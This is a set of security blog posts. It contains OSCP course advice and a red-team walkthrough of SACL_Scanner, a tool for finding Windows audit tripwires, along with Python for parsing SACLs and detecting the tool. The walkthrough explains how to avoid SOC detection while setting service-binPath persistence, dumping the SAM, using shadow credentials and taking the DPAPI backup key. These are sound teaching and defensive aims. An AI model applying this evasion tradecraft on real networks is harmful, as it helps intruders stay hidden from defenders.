When people think of service disruption in cybersecurity, their minds often jump to denial of service (DoS) attacks. However, even legitimate penetration testing techniques, if used carelessly, can cause outages and service unavailability. This risk is a major deterrent for businesses considering cybersecurity consulting services, as potential disruptions — such as bandwidth spikes, application latency, or unscheduled downtime — can lead to performance degradation and reputational damage. Common offenders include port scanners like Nmap, vulnerability scanners like Nessus, and brute-force password tools like Kerbrute, which can trigger account lockouts due to repeated failed login attempts. In real-world scenarios, penetration testers must pace network scans carefully, communicate clearly with the client about targeted systems and services, and adhere to account lockout policies to minimize disruptions.

Some tools and techniques can inadvertently expose plaintext credentials or hashed passwords, introducing serious security risks. In a simulated exercise, for example, we might use Mimikatz to dump NT LAN Manager (NTLM) hashes from memory or input a username and password into the Get-Credential PowerShell cmdlet before passing them to a PowerView function. While this may seem harmless in a controlled lab environment, the real-world consequences are far graver. If a Windows host logs command line output or an EDR solution records process activity, these credentials could be stored in logs accessible to administrators, regular users, or even threat actors — potentially leading to credential theft and further malicious actions long after the engagement is complete. Using third-party cloud-hosted tools to process artifacts containing client secrets — such as CrackStation for password hashes or DynamiteLab for packet captures — could also result in credential exposure, as neither the consultants nor the client have control over where that sensitive data is stored.

Lastly, we must consider whether a method could violate personal ethical boundaries or contractual obligations. Cybersecurity consulting firms often establish internal guidelines prohibiting high-risk activities that could cause irreversible damage with little value in a report, such as intentional DoS attacks, disabling security services, unauthorized password changes, or exfiltrating sensitive data like the ntds.dit database or structures containing personally identifiable information (PII). Consultants are also contractually bound by the client-imposed rules of engagement (ROE), which may restrict certain tactics or system/user targets, requiring testers to adjust their tradecraft. For example, Responder, a tool used for capturing NTLM v2 hashes, could unintentionally collect credentials from out-of-scope users or systems, constituting an indirect ROE violation. Ultimately, both personal ethics and professional constraints can significantly impact how penetration testers apply offensive techniques in real-world engagements.

In this section, I’ve explored four critical questions students should ask themselves after becoming proficient with a new security tool or technique:

  1. Does this tool/technique carry a high risk of triggering OPSEC solutions?
  2. Could this tool/technique result in service disruptions?
  3. Could this tool/technique expose plaintext credentials or weak password hashes?
  4. How could this tool/technique violate ethical or contractual boundaries?

NOTE:
Other important questions to consider — but omitted for brevity — include: “Would bypassing a common OPSEC solution for this tool/technique require disabling security services?”, “Does this tool/technique leave behind system artifacts that require cleanup to maintain stealth or as part of post-engagement procedures?”, and “Which threat actors have used this tool/technique before?”.

While these questions are important, they should not interfere with your learning process while navigating the course for the first time. Instead, keep them in the back of your mind and revisit them once you have the confidence and time to explore them fully. Developing this awareness early will help ensure you approach offensive security with the professionalism and responsibility expected in real-world engagements.

Read the Footnotes and Follow the Authors

Earlier this year, while preparing for the Offensive Security Experienced Penetration Tester (OSEP) certification, I was working through the PEN-300 course material, a direct continuation of the techniques taught in PEN-200. As I reviewed the footnotes in one of the modules, a particular blog post caught my attention. The topic was interesting, but what really stood out was the author’s handle — it looked vaguely familiar. Curious, I clicked on their profile to dig deeper.

A few seconds later, it hit me. I had accidentally stumbled on my boss’s old blog channel!

This story underscores an important lesson: the footnotes in PEN-200 (and other OffSec courses) aren’t just extra reading material — they’re a window into the offensive security industry. The white papers, PoCs, and blog posts referenced in these courses were written by researchers and hackers who have shaped modern penetration testing techniques and, in some cases, you may even cross paths with them later in your career. Taking the time to explore these citations offers more than just educational enrichment. It provides insight into “who’s who” in the industry, giving you an edge when networking or job hunting. While the extra reading may seem tedious, its benefits are an underappreciated strength of the course.

Understanding who the key players are in offensive security isn’t just an academic exercise; it’s a form of situational awareness that can benefit your career. The individuals whose blog posts and exploit code appear throughout the PEN-200 course are often the same ones presenting at security conferences, contributing to your favorite security tools, or even leading your next interview. The offensive security industry is surprisingly small, so by familiarizing yourself with just a handful of regular contributors, you gain a solid understanding of current industry trends, the companies driving innovation in different areas of cybersecurity, and even what technical skills hiring managers are prioritizing. This awareness can help you make more informed decisions, from identifying career mentors to choosing which companies to apply to.

Once you’ve read the footnote and understood its material, make an effort to follow the author on any platform where they have a public profile. Many security researchers publish their articles on Medium, but it’s also common to find their work cross-posted on personal websites. If the author works at a cybersecurity consulting firm, check their company’s blog — firms like TrustedSec, Mandiant, PortSwigger, and SpecterOps regularly publish security research. If the footnote references a coding project, explore the author’s GitHub profile to see their other work or contributions to open-source projects. Following them on X (formerly Twitter), BlueSky, or LinkedIn ensures you’ll receive timely updates on future publications. Lastly, try searching for the author on YouTube by their full name or handle, as they may have presented at major cybersecurity conferences like DEF CON, Black Hat, or RSA Conference.

Taking the time to read the footnotes and dive into the work of influential security researchers not only enhances the educational value you gain from the PEN-200 course, but also sharpens your situational awareness of the offensive security industry. This knowledge can serve as a powerful networking tool, help you discover new areas of professional interest, and guide your career path. So, next time you come across a footnote, don’t just skim it — take the extra step and use it as a launchpad for further exploration. You might just end up connecting with your next manager…

Conclusion

As always, feel free to comment if you enjoyed the article, have questions/criticisms, or would have liked to see other arguments included. In the next post, I will discuss my advice for the PEN-200 labs.


Getting the Most Value Out of the OSCP: The PEN-200 Course was originally published in Posts By SpecterOps Team Members on Medium, where people are continuing the conversation by highlighting and responding to this story.


Don’t Touch That Object! Finding SACL Tripwires During Red Team Ops

During red team operations, stealth is a critical component. We spend a great deal of time ensuring our payloads will evade any endpoint detection and response (EDR) solution, our traffic is obfuscated and hard to trace, and our commands will interact with a system in a way that limits the number of possible detection opportunities based on our actions that could thwart our operation; however, even when tiptoeing around a client environment, we have likely all experienced a scenario where we happen to list the wrong directory, read the wrong file, or access the wrong registry key and set off an alert to the Security Operations Center (SOC) to get an investigation rolling. I am, of course, talking about that pesky system access control list (SACL) that generated a simple Windows event letting the SOC know someone tried to access something they should not.

DACL vs. SACL

If you have spent some time in the field, you are likely familiar with DACLs and SACLs, but I will do a quick recap to refresh some minds and educate the rest. We will start with the securable object. From Microsoft’s documentation: “A securable object is an object that can have a security descriptor. All named Windows objects are securable. Some unnamed objects, such as process and thread objects, can have security descriptors too.” So, any securable object can have a security descriptor applied to it that can contain access control lists (ACLs). We are talking about files, registry keys, processes, pipes, services, etc. The ACLs within the security descriptor come in two flavors: discretionary access control lists (DACLs) and SACLs.

Most people are more familiar with the DACL, which determines whether a security principal attempting to access a securable object in question is allowed to do so based on allow or deny entries. This is done based on several factors in the access token, but in short, we can equate it to the doorman at a bar. A user attempts to access the bar and presents their ID to the doorman, then the doorman checks their ID and allows or denies them entry based on the information provided. SACLs, on the other hand, are more like a logbook. They are not determining access; they only log whether the security principal succeeded or failed to access the securable object. We can think of this as a scribe standing next to the doorman at the bar, writing down the names of every person who attempts to access the bar and whether the doorman allows or denies them.

We have seen the use of these technological trip flares increasing lately. While the increase in SACL usage is not bad, it does mean that we need to be even more careful about what we access in an environment. Honeypot accounts in Active Directory (AD) can catch the use of tools like BloodHound when it tries to read an AD object that no one was intended to read, the registry could be watched to see if an attacker tries to access local security authority (LSA) registry keys, or it could be as simple as a “password” file on a share set to let defenders know if someone tries to access some suspiciously sweet administrator credentials. As organizations and defenses mature, it is becoming more crucial for red teamers to know what we should not risk touching.

Enter SACL Scanner

To help with this, and learn C along the way, I created a simple C program called SACL_Scanner to aid fellow red teamers in identifying the configured trip flares so we can avoid them. Currently, it will scan for SACLs on three local Windows securable objects and AD: registry keys, services, files/directories, and AD objects. It is also compiled to run with execute_pe in most C2 frameworks since it is much more likely that a red teamer will be in that scenario rather than directly on a host running programs.

Before we get into the demos, we need to talk about the obvious barrier to what we are trying to achieve: privileges. We will need the SE_SECURITY_NAME privilege corresponding to the objects we are trying to read. This means that we must be at least an administrator or have the SE_SECURITY_NAME privilege assigned to our access token. It is likely that when you are really worried about SACLs on other users’ files, registry keys for the security account manager (SAM), or mucking with services on the local host, you are already an administrator; ergo, it should not be too much of an issue there. However, when trying to read the SACLs on AD objects, we run into a bit of a catch-22 in that we might want to know what objects we should not touch so we can execute an attack path in AD to elevate our access therein, but we need elevated permissions to read the SACLs on AD objects to know which objects we should not touch. Sadly, I do not have a solution for that as that is AD working correctly. Nevertheless, we can still obtain additional information once we have elevated our access, tread lightly, and limit our indicators of compromise (IOCs).

Additionally, the tool will not tell you whether auditing itself is enabled. Two parts combine to produce the event logs used for detection: the SACL on the securable object, and the computer's audit policy settings, which determine whether the log entries are actually generated. Both must be in place for a SACL to provide any value. If a SACL is set on an object but auditing is not enabled, the SACL does not really matter; conversely, if auditing is enabled but nothing has a SACL set, auditing generates nothing. One could argue this is only partially true, as some objects such as LSASS have SACLs set by default, but we will not get into that list here since Microsoft does not make it readily available. To reiterate, in our case we are only checking for SACLs on securable objects, not whether auditing is enabled.

For demo purposes, I am running a simple Windows environment with a single workstation and domain controller (DC). For my command and control (C2) framework, I am using the Mythic framework with a Merlin agent running on the workstation. In this case, the agent runs under the context of an elevated user to show the output. Also, forewarning, I will not be covering covert techniques themselves but rather a down-the-middle use case to focus on the tool and output itself.

Alright; now that the background, summary, and requirements are complete, let’s get into the simple demos. We will start with the registry. There is so much information available to us in the registry that we are almost guaranteed to interact with it in some way during an assessment, whether intentionally or not. But where do we want to start our testing to see which important registry (sub)keys defenders might be watching? Thankfully, one of my defensive cohorts, Luke Paine, already made a sample list in his Defender’s Guide post, The Defender’s Guide to the Windows Registry. As part of his detailed coverage of registry SACLs, he provided a .csv file listing keys and the registry operation to watch for each: Highly Targeted Registry Keys.csv. Let’s start with a few items from this list to test our SACL setup in a lab.

The following few pictures show the setup of the audit policies and SACLs so we can conduct testing. If you are unfamiliar with setting this up, you can think of it as a little guide to setting SACLs in your environment. First, for our local host, we go into Local Security Policy, then Local Policies > Audit Policy, and ensure that Audit object access is enabled (Figure 1).

Figure 1 — Audit Object Access Enabled

Next, we can start setting up some SACLs. We will use the HKLM\SYSTEM\CurrentControlSet\Services registry key referenced in the Defender’s Guide. For simplicity, open regedit.exe, browse to the key, right-click, and select Permissions (Figure 2).

Figure 2 — HKLM\SYSTEM\CurrentControlSet\Services Permissions

Select “Advanced” in the security permissions window (Figure 3).

Figure 3 — Security Permissions Window

Next, select Auditing. If you are unfamiliar with the basic layout of the advanced security window: the Permissions tab shows and sets DACLs, Auditing handles SACLs, and Effective Access, as it sounds, tests the access a specified account would have. In my case, you will see that I have set a SACL to audit anyone in Authenticated Users accessing this registry key (Figure 4).

Figure 4 — Advanced Security Settings

If we select the SACL, we can see the principal again; the type is set to success auditing, applies to this key and subkeys (inheritance set), and audits on Set Value and Create Subkey (Figure 5).

Figure 5 — SACL Settings on Registry Key

Now that we have our test SACLs set, we can pick a service to modify and ensure it works. In my case, I went with the OneSyncSvc and decided to change the ImagePath to set up some simple persistence (Figure 6).

Figure 6 — OneSyncSvc Registry Keys

Before we start the SACL testing, we open the Windows Event Viewer, navigate to Windows Logs > Security, and set a filter on Windows event ID (EID) 4663: “An attempt was made to access an object” (Figure 7). I cleared the existing events to make sure we start with a fresh list.

Figure 7 — Event Viewer Filtered

In our elevated Merlin agent, we use a simple run sc config command to modify the binPath of the service OneSyncSvc to instead point to a payload (Figure 8).

Figure 8 — Service Modification

After the command, we can double-check that the service changed by refreshing our regedit and see that the ImagePath has changed for OneSyncSvc (Figure 9).

Figure 9 — ImagePath Changed

In Event Viewer, we now have a new EID 4663 (i.e., “An attempt was made to access an object”) stating that NT AUTHORITY\SYSTEM accessed the registry key HKLM\SYSTEM\CurrentControlSet\Services\OneSyncSvc (Figure 10). This event is our expected result: we set the SACL to audit access on Services and inherit it to subkeys, so we catch modifications on all services. Opening the event, we see that the requested access was Set key value, corresponding to our modification (Figure 11).

Figure 10 — Event 4663 Logged
Figure 11 — Access Requested: Set Key Value

We can double-check things like this ahead of time to avoid tripping the SACL with this simple SACL_Scanner tool. It works with execute_pe (and Octoberfest7’s inline-execute-pe). Running the tool with the “-r” flag followed by the key we want to target gives us the desired information. It will scan an entire hive if we target the hive itself (HKEY_LOCAL_MACHINE, HKEY_CURRENT_USER). It checks whether an item has any SACLs, whether each is a direct or inherited SACL, and the SACL details that tell us what is being audited (Figure 12). Now, depending on how the SACL is set up, this check is not foolproof against being detected, but I will go into further detail on that in the detection section.

Figure 12 — Registry Services SACL_Scanner Result

Now, let’s check OneSyncSvc directly. It tells us there is a SACL applied to the key but does not give us details on it (Figure 13). This is intentional since it is an inherited SACL. It will display direct SACLs when requested, but inherited SACLs will only display when the verbose flag (-v) is added so we do not get too much information when scanning multiple items.

Figure 13 — Registry OneSyncSvc SACL_Scanner Result

Rerunning the command with the “-v” flag gives us the complete information we want and some additional security identifier (SID) information (Figure 14).

Figure 14 — Verbose Registry Key Check

Adding the “-opsec” flag allows us to run an additional check to determine if the SIDs within the SACL match any SIDs applied to our current access token. We can see that we have a detected match in this case, which lets us know that we should avoid modifying this registry key further, or we would trip the SACL (Figure 15). Note: a known limitation of this is that the tool compares the SIDs in the access token to the SACL, which means any nested groups that would not be added to the access token will not come back as detected since we are not unrolling groups here.

Figure 15 — SACL OPSEC Check

Now, let’s check the SAM SACL to see if dumping the SAM would get us burned. We can start by setting a SACL on HKLM\SAM with the same steps. When we try to access a key under HKLM\SAM, an event log lets us know someone has tried to access those keys (Figure 16).

Figure 16 — HKLM\SAM SACL Event

When checking HKEY_LOCAL_MACHINE\SAM with SACL_Scanner, we get the info we want to see, letting us know there is a SACL set and that we should avoid dumping the SAM (Figure 17).

Figure 17 — HKLM\SAM SACL_Scanner Check

I will run through some of the other flags pretty quickly as they should be understood pretty easily. Using the “-f” flag followed by a file on the host or share will similarly check the SACLs (Figure 18).

Figure 18 — File SACL Check

Next, we can use “-d” to instead feed it a directory to check the files therein. Notice that we have multiple files here and only one has SACLs applied (Figure 19). Sometimes we can judge based on names and settings. In our example below, we can see that there is a SACL directly applied to my tongue-in-cheek mock honeypot file to alert on reading the file; however, the server_PWs.txt file right above it has none. We can infer that I might not want to touch the more tempting file if I can avoid it.

Figure 19 — SACL_Scanner Directory Check

If we throw the “-opsec” flag into the directory listing, we first check the directory itself to decide whether we should list files at all. If enumerating the file SACLs within a directory would itself trip a SACL, that directory is skipped (Figure 20). This check is nice with a targeted directory but even more important when we use just “-d” without a supplied directory, which scans the entire C:\ drive.

Figure 20 — Directory SACL Check

Also, while I have not seen it much, we can scan services with “-s.” The flag by itself will check all services, or we can add a specific service to target (Figure 21).

Figure 21 — SACL_Scanner Service Check

Now, on to some AD checks. We start by ensuring the Audit Policy on the domain controller has “Audit directory service objects” enabled (Figure 22). We do not necessarily need it for our SACL checks, but it is good to include it if anyone needs the extra step to help turn on SACL eventing.

Figure 22 — Enabled Directory Object Auditing

As I stated earlier in the post, the major blocker in reading AD SACLs is simply having the privilege to read the SACLs on AD objects. I know it’s a bit counterproductive and, sadly, it means we cannot collect them the way we collect DACLs with a tool like SharpHound. As such, it will likely be of more use when you are trying to establish domain persistence than when you are finding an attack path to rise to the top. The flags should make sense based on what we have covered. We add the “-a” flag to target AD, followed by the “LDAP://{distinguished name}” of the object we want to target. Adding the “-opsec” flag will again check our SIDs to see whether we would trip the SACL, and there is a hash map (the reason the file is a bit big) of GUIDs mapped to user object class attributes. In our case below, we can see that there is a SACL applied to specterDA which will trigger on writing to the msDS-KeyCredentialLink attribute (Figure 23). If we have not used shadow credentials so far during our assessment, we know we should not try that as our persistence on this DA account.

Figure 23 — Domain Admin Check

While the hash map covers those user object class attributes, we can still obtain the SACLs on other objects, like the data protection API (DPAPI) domain backup key. Running the scanner against that object in my little test lab produces a sample output of no SACLs applied, so, in a SACL sense, we should be fine to back up that key and do what we need to from there (Figure 24).

Figure 24 — Domain Backup Key Check
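To make the output in Figures 12 through 17 and 23 through 24 concrete, here is an added example (my own code, not SACL_Scanner’s) that parses the SACL straight out of a self-relative security descriptor, the byte layout the Win32 security APIs return for a registry key and that LDAP returns in nTSecurityDescriptor. It constructs three descriptors in memory that mirror the lab (the inherited Services SACL as seen on OneSyncSvc, a DA user object audited on msDS-KeyCredentialLink, and a SACL-less object like the DPAPI backup key), decodes success/failure auditing, direct versus inherited entries, the access mask and the attribute GUID of an AD object ACE, and runs the same token-SID comparison the “-opsec” flag performs, with the nested-group caveat from the post. The SIDs, token SIDs and object names are constructed; the msDS-KeyCredentialLink GUID is that attribute’s schemaIDGUID from the AD schema reference.

```python
"""Parse the SACL of a self-relative Windows security descriptor (MS-DTYP layout).
Added example, not SACL_Scanner's code. Descriptors below are constructed in memory."""
import struct
import uuid

SE_SACL_PRESENT = 0x0010             # security descriptor control flags (winnt.h)
SE_SELF_RELATIVE = 0x8000
SYSTEM_AUDIT_ACE_TYPE = 0x02         # plain SACL entry (registry, file, service)
SYSTEM_AUDIT_OBJECT_ACE_TYPE = 0x07  # AD entry scoped to one attribute / property set
INHERITED_ACE = 0x10                 # ACE flags
SUCCESSFUL_ACCESS_ACE_FLAG = 0x40
FAILED_ACCESS_ACE_FLAG = 0x80
ACE_OBJECT_TYPE_PRESENT = 0x1        # object ACE flags
ACE_INHERITED_OBJECT_TYPE_PRESENT = 0x2
KEY_SET_VALUE, KEY_CREATE_SUB_KEY = 0x2, 0x4  # registry rights audited in Figure 5
ADS_RIGHT_DS_WRITE_PROP = 0x20                # AD "Write Property"
# schemaIDGUID of msDS-KeyCredentialLink (AD schema reference); the post's hash map
# carries this mapping for the whole user object class.
ATTRIBUTE_GUIDS = {"5b47d60f-6090-40b2-9f37-2a4de88f3063": "msDS-KeyCredentialLink"}


def build_sid(sid_str):
    """'S-1-5-11' -> binary SID: revision, sub-authority count, 6-byte BE authority, LE subs."""
    p = sid_str.split("-")
    subs = [int(x) for x in p[3:]]
    return (bytes([int(p[1]), len(subs)]) + int(p[2]).to_bytes(6, "big")
            + struct.pack("<%dI" % len(subs), *subs))


def parse_sid(buf, off):
    rev, count = buf[off], buf[off + 1]
    auth = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d" % (rev, auth) + "".join("-%d" % s for s in subs)


def build_audit_ace(sid, mask, flags, object_guid=None):
    body = struct.pack("<I", mask)
    ace_type = SYSTEM_AUDIT_ACE_TYPE
    if object_guid is not None:  # AD object ACE: object flags + attribute GUID precede the SID
        ace_type = SYSTEM_AUDIT_OBJECT_ACE_TYPE
        body += struct.pack("<I", ACE_OBJECT_TYPE_PRESENT) + uuid.UUID(object_guid).bytes_le
    body += build_sid(sid)
    return struct.pack("<BBH", ace_type, flags, 4 + len(body)) + body


def build_sd(aces, acl_revision=2):
    """Self-relative descriptor carrying only a SACL (owner/group/DACL offsets left 0)."""
    acl_body = b"".join(aces)
    acl = struct.pack("<BBHHH", acl_revision, 0, 8 + len(acl_body), len(aces), 0) + acl_body
    return struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE | SE_SACL_PRESENT, 0, 0, 20, 0) + acl


def parse_sacl(sd):
    """Return the audit ACEs in sd's SACL; [] means nothing on this object is audited."""
    _, _, control, _, _, sacl_off, _ = struct.unpack_from("<BBHIIII", sd, 0)
    if not (control & SE_SACL_PRESENT) or sacl_off == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, sacl_off)
    off, aces = sacl_off + 8, []
    for _ in range(ace_count):
        ace_type, ace_flags, ace_size = struct.unpack_from("<BBH", sd, off)
        mask = struct.unpack_from("<I", sd, off + 4)[0]
        pos, object_type = off + 8, None
        if ace_type == SYSTEM_AUDIT_OBJECT_ACE_TYPE:
            obj_flags = struct.unpack_from("<I", sd, pos)[0]
            pos += 4
            if obj_flags & ACE_OBJECT_TYPE_PRESENT:
                object_type = str(uuid.UUID(bytes_le=sd[pos:pos + 16]))
                pos += 16
            if obj_flags & ACE_INHERITED_OBJECT_TYPE_PRESENT:
                pos += 16  # inherited-object-type GUID, not needed here
        if ace_type in (SYSTEM_AUDIT_ACE_TYPE, SYSTEM_AUDIT_OBJECT_ACE_TYPE):
            aces.append({"sid": parse_sid(sd, pos), "mask": mask,
                         "inherited": bool(ace_flags & INHERITED_ACE),
                         "on_success": bool(ace_flags & SUCCESSFUL_ACCESS_ACE_FLAG),
                         "on_failure": bool(ace_flags & FAILED_ACCESS_ACE_FLAG),
                         "object_type": object_type})
        off += ace_size
    return aces


def matching_aces(aces, token_sids):
    """Audit entries whose trustee SID the token carries (the -opsec style check).
    Nested groups the token does not carry are not unrolled, so an empty result means
    'no match seen', not that the object is unaudited for this principal."""
    return [a for a in aces if a["sid"] in set(token_sids)]


def describe(aces):
    out = []
    for a in aces:
        when = "+".join(n for n, on in (("success", a["on_success"]), ("failure", a["on_failure"])) if on)
        target = ATTRIBUTE_GUIDS.get(a["object_type"], a["object_type"]) if a["object_type"] else "object"
        out.append("%s: %s audit, %s, mask=0x%x on %s" % (
            a["sid"], when, "inherited" if a["inherited"] else "direct", a["mask"], target))
    return out


# Constructed samples mirroring the post's lab, not captured from a real host.
# 1) The Services SACL of Figure 5 as inherited onto OneSyncSvc: Authenticated Users,
#    success auditing, Set Value + Create Subkey.
REGISTRY_SD = build_sd([build_audit_ace("S-1-5-11", KEY_SET_VALUE | KEY_CREATE_SUB_KEY,
                                        SUCCESSFUL_ACCESS_ACE_FLAG | INHERITED_ACE)])
# 2) A DA user object auditing any write to msDS-KeyCredentialLink by Everyone (S-1-1-0).
AD_SD = build_sd([build_audit_ace("S-1-1-0", ADS_RIGHT_DS_WRITE_PROP,
                                  SUCCESSFUL_ACCESS_ACE_FLAG | FAILED_ACCESS_ACE_FLAG,
                                  object_guid="5b47d60f-6090-40b2-9f37-2a4de88f3063")], acl_revision=4)
# 3) No SACL at all, like the DPAPI backup key in Figure 24.
NO_SACL_SD = struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE, 0, 0, 0, 0)

if __name__ == "__main__":
    token_sids = ["S-1-5-21-1111-2222-3333-500", "S-1-5-32-544", "S-1-5-11", "S-1-1-0"]  # constructed
    for name, sd in (("Services\\OneSyncSvc", REGISTRY_SD), ("CN=specterDA", AD_SD),
                     ("DPAPI backup key", NO_SACL_SD)):
        aces = parse_sacl(sd)
        print(name + ":", "no SACL" if not aces else "")
        for line in describe(aces):
            print("   " + line)
        if matching_aces(aces, token_sids):
            print("   this token's SIDs appear in the SACL")
```

Pointing parse_sacl at real bytes (RegGetKeySecurity with SACL_SECURITY_INFORMATION, or an LDAP read of nTSecurityDescriptor with the SD-flags control requesting the SACL) needs the same SeSecurityPrivilege the post describes; the parser itself only cares about the layout. Note how the verbose/non-verbose distinction in Figures 13 and 14 maps onto the inherited flag of each entry rather than onto anything in the key itself.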

Detections

When dealing with SACLs, reading the information requires interacting with the securable object, and that interaction can itself be detected. The SACLs I commonly see on objects audit either modifications of an object or reads of the data in a file or registry key. The event log this generates on a host is EID 4663 (i.e., “An attempt was made to access an object”). While this event is the primary log SACL_Scanner is designed to identify, in the hope of avoiding generating it, you can use additional logs to detect the tool. For example, EID 4656 (i.e., “A handle to an object was requested”) gives us the precursor to EID 4663: to read an object’s SACL, we still need to obtain a handle to it and read its permissions. Adding “Read Permissions” or “Read Attributes” checks to the SACL will therefore identify SACL_Scanner obtaining the handle to read the SACLs (Figure 25). As with anything in security, there are pros and cons to this: adding these checks to the SACL will create many more events, since standard Windows programs like explorer.exe read permissions as part of their essential functions.

Figure 25 — Event Generated by SACL_Scanner
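As an added example of the host-side detection described above (my own code, not the Sigma rule the post refers to), the following runs two checks over constructed Security log records shaped like the data fields of EIDs 4663 and 4656: the tripwire itself (a 4663 with Set Value on a watched Services key, as in Figures 10 and 11) and a noisier heuristic for the scanner’s own footprint, which aggregates 4656 READ_CONTROL handle requests from one user and process across many watched keys while setting aside explorer.exe and services.exe, which read permissions constantly. The watched paths, the process allow-list and the threshold of five objects are assumptions to tune per environment; the records are constructed, not captured.

```python
"""Detection logic for SACL tripwires over Security log records.
Added example, not the post's Sigma rule. Records are constructed to look like the
data fields of EIDs 4663/4656 as a SIEM or Get-WinEvent would hand them over."""
import re
from collections import defaultdict

READ_CONTROL = 0x00020000   # "Read Permissions": needed on a handle before the SACL can be read
KEY_SET_VALUE = 0x00000002  # "Set Value": what the post's Services SACL audits

# Object names appear in kernel form in these events, so the watch list matches that form.
WATCHED = [re.compile(r"^\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet\d+\\Services\\", re.I),
           re.compile(r"^\\REGISTRY\\MACHINE\\SAM\\", re.I)]
# Built-in processes that read permissions constantly (the post singles out explorer.exe).
# Assumption: tune this allow-list per environment.
NOISY = {r"c:\windows\explorer.exe", r"c:\windows\system32\services.exe"}


def is_watched(object_name):
    return any(p.search(object_name) for p in WATCHED)


def tripwire_hits(events):
    """EID 4663 carrying an audited modify access on a watched key: the intended alert."""
    return [e for e in events if e["EventID"] == 4663
            and is_watched(e["ObjectName"]) and e["AccessMask"] & KEY_SET_VALUE]


def scanner_like(events, min_objects=5):
    """EID 4656 READ_CONTROL handle requests from one (user, process) across many watched
    objects. One permission read is routine; a sweep over many keys is the pattern a
    SACL enumerator leaves, so aggregate before alerting."""
    seen = defaultdict(set)
    for e in events:
        if (e["EventID"] == 4656 and e["AccessMask"] & READ_CONTROL
                and is_watched(e["ObjectName"]) and e["ProcessName"].lower() not in NOISY):
            seen[(e["SubjectUserName"], e["ProcessName"])].add(e["ObjectName"])
    return {who: sorted(objs) for who, objs in seen.items() if len(objs) >= min_objects}


def ev(eid, user, proc, obj, mask):
    return {"EventID": eid, "SubjectUserName": user, "ProcessName": proc,
            "ObjectName": obj, "AccessMask": mask}


SVC = "\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Services\\"
SAMPLE_EVENTS = [  # constructed, not captured from a real host
    # Figures 10/11: sc config changing OneSyncSvc's ImagePath (Set key value).
    ev(4663, "SYSTEM", r"C:\Windows\System32\services.exe", SVC + "OneSyncSvc", KEY_SET_VALUE),
    # explorer.exe reading permissions on a couple of keys: expected noise.
    ev(4656, "jdoe", r"C:\Windows\explorer.exe", SVC + "Spooler", READ_CONTROL),
    ev(4656, "jdoe", r"C:\Windows\explorer.exe", SVC + "BITS", READ_CONTROL),
    # A permission read on an unwatched key: ignored.
    ev(4656, "jdoe", r"C:\Temp\agent.exe", "\\REGISTRY\\USER\\S-1-5-21-1-2-3-1001\\Software\\Foo", READ_CONTROL),
]
# An unknown binary asking for READ_CONTROL on six service keys in a row.
SAMPLE_EVENTS += [ev(4656, "jdoe", r"C:\Temp\agent.exe", SVC + s, READ_CONTROL)
                  for s in ("OneSyncSvc", "Spooler", "BITS", "WinRM", "Schedule", "LanmanServer")]

if __name__ == "__main__":
    for e in tripwire_hits(SAMPLE_EVENTS):
        print("TRIPWIRE 4663:", e["SubjectUserName"], e["ProcessName"], e["ObjectName"])
    for (user, proc), objs in scanner_like(SAMPLE_EVENTS).items():
        print("SCANNER-LIKE 4656 sweep: %s via %s read permissions on %d watched keys"
              % (user, proc, len(objs)))
```

The 4656 aggregation is what keeps the “Read Permissions” approach usable: a single READ_CONTROL request is routine, while a sweep across many watched keys from one process is the pattern any SACL enumerator leaves, whether it is this tool or another. The allow-list trades a blind spot on those processes for a manageable alert volume, which is the tuning trade-off the post describes.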

Similarly, in AD, we try to avoid writing the wrong properties by identifying them first, but other SACLs can detect our access attempts. By setting SACLs on reading object properties, specifically the Public-Information property set and the Object-Class attribute, which contain the NT-Security-Descriptor, we can detect SACL_Scanner looking at the SACLs on an AD object. We can see the GUIDs in an EID 4662 log, showing that we are reading those properties (Figure 26), and compare them to the Microsoft documentation (Figure 27 and Figure 28). Auditing reads of AD objects generates an immense amount of traffic, so a detection going that route will need heavy tuning to gain any real value from it.

Figure 26 — Event Generated by SACL_Scanner Reading AD Object
Figure 27 — Public-Information Property Set GUID
Figure 28 — Object-Class Attribute GUID

I am not a detection engineer, but to help with this I have made a basic Sigma rule that should help with detecting this tool and hopefully similar techniques.

That’s all for today. I hope this gives you a deeper understanding of how defenders are leveraging SACLs to detect unauthorized access attempts and how you can use SACL_Scanner to adapt your tradecraft accordingly. By being aware of these audit tripwires, you can fine-tune your enumeration, privilege escalation, and other techniques to remain stealthy.

Remember, effective red teaming isn’t just about bypassing defenses — it’s about continuously evolving alongside them. Stay proactive in researching new detection mechanisms, refining your OPSEC, and understanding the blue team’s perspective.

Until next time, stay sharp and tread carefully.


Don’t Touch That Object! Finding SACL Tripwires During Red Team Ops was originally published in Posts By SpecterOps Team Members on Medium, where people are continuing the conversation by highlighting and responding to this story.

Getting the Most Value Out of the OSCP: Pre-Course Prep

The first post in a five-part practical guide series on maximizing the professional, educational, and financial value of the OffSec certification pursuit for a successful career in offensive cybersecurity consulting

Disclaimer:
All opinions expressed in this article are solely my own. I have reviewed the content to ensure compliance with OffSec’s copyright policies and agreements. I have not been sponsored or incentivized in any way to recommend or oppose any resources mentioned in this article.

Introduction

Love it or hate it, the Offensive Security Certified Professional (OSCP) remains a significant hurdle for many aspiring offensive security consulting professionals. While the course and exam offer undeniable educational value, I believe there are underappreciated practical steps students can take during their “OSCP journey” to strengthen their candidacy and develop the essential soft and technical skills needed for success in the field. In this post (hopefully the first of a small series), I’ll explore three pieces of practical advice for students to consider before enrolling in the course. In future posts, I hope to explore more advice tailored to distinct phases of the OSCP journey.

PEN-200: Penetration Testing Certification with Kali Linux | OffSec

A Little Bit About Me

I am an associate consultant in the offensive security consulting industry, having successfully transitioned from a career as a software engineer in information technology (IT). While my background in offensive security consulting is still growing, I feel that my recent experience as a student trying to earn the OSCP certification (or, as I like to call them, “OSCP-hopefuls”) and my successful pivot into this field have provided me with valuable insights to share on this topic.

Some Background Context

The OSCP is a popular cybersecurity certification that tests an individual’s ability to identify, exploit, and report on misconfigurations/vulnerabilities affecting web applications, common network services, and the Linux and Windows operating systems. Maintained by OffSec (formerly Offensive Security), the certification stands out due to its rigorous exam, which requires candidates to complete a 24-hour practical black-box penetration testing scenario. Students are given an additional 24 hours to write and submit a report for grading. To earn the OSCP, candidates must successfully exfiltrate a minimum number of “flags” and submit a satisfactory report.

